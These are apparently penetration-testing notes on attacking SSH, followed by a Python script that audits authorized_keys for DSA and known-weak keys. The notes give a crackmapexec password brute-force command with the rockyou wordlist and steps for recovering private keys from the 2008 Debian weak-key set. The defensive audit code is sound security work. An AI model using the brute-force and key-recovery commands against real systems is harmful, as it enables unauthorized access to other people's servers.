ssh 22
- Brute-forcing credentials using crackmapexec:
crackmapexec ssh 10.11.1.251 -u <user> -p /usr/share/wordlists/rockyou.txt
- If the machine is running a very old Linux from around 2008, the SSH public and private key pairs are publicly available. Since authorized_keys holds the public key, it can be used to find the matching private key:
- git clone https://github.com/g0tmi1k/debian-ssh
- cd debian-ssh/common_keys/
- tar -vjxf debian_ssh_dsa_1024_x86.tar.bz2
- cd dsa/1024
- grep -lr "<20 characters from authorized_keys>"
- This gives the private key
- If there is any error, try:
- Configure /etc/ssh/ssh_config
- Add this line at the end: PubkeyAcceptedKeyTypes +ssh-dss
- Use arguments like these with the ssh command if there is any error:
-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
- configure /etc/ssh/ssh_config
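
On the defending side, both weaknesses noted above (DSA keys, and key pairs whose private half is publicly known) can be found by auditing authorized_keys files. The following is an added example, not part of the original notes: it assumes the caller supplies a set of MD5 fingerprints (hex, no colons) of known-weak keys, and the function names and sample data are constructed for illustration.

```python
import base64, hashlib, re, struct

# Key type token, then the base64 blob; authorized_keys options may precede them.
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-dss|ssh-rsa|ssh-ed25519|ecdsa-sha2-\S+)\s+([A-Za-z0-9+/]+=*)")

def wire(*fields):
    """Build a base64 key blob from raw fields (used only for sample data)."""
    raw = b"".join(struct.pack(">I", len(f)) + f for f in fields)
    return base64.b64encode(raw).decode()

def read_fields(blob):
    """Split a decoded key blob into its 4-byte-length-prefixed fields."""
    fields, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack(">I", blob[off:off + 4])  # struct.error if truncated
        if off + 4 + n > len(blob):
            raise ValueError("truncated field")
        fields.append(blob[off + 4:off + 4 + n])
        off += 4 + n
    return fields

def audit(text, weak_md5=frozenset()):
    """Return (line number, MD5 fingerprint, reasons) for keys to replace."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = KEY_RE.search(line)
        if line.lstrip().startswith("#") or not m:
            continue
        ktype, b64 = m.groups()
        try:
            blob = base64.b64decode(b64, validate=True)
            fields = read_fields(blob)
        except (ValueError, struct.error):
            findings.append((lineno, None, ["malformed key blob"]))
            continue
        fp, reasons = hashlib.md5(blob).hexdigest(), []
        if not fields or fields[0] != ktype.encode():
            reasons.append("declared type does not match blob")
        elif ktype == "ssh-dss":
            reasons.append("DSA key (ssh-dss)")
        if fp in weak_md5:  # assumption: blocklist supplied by the caller
            reasons.append("fingerprint on weak-key blocklist")
        if reasons:
            findings.append((lineno, fp, reasons))
    return findings

# Constructed sample: a synthetic blob, not a real key.
DSA_BLOB = wire(b"ssh-dss", b"\x00" + b"\xff" * 128, b"\x01", b"\x02", b"\x03")
SAMPLE = f'# constructed\nfrom="10.0.0.5" ssh-dss {DSA_BLOB} old@host\n'
```

Any key the audit reports should be removed from authorized_keys and replaced with a freshly generated key of a current type.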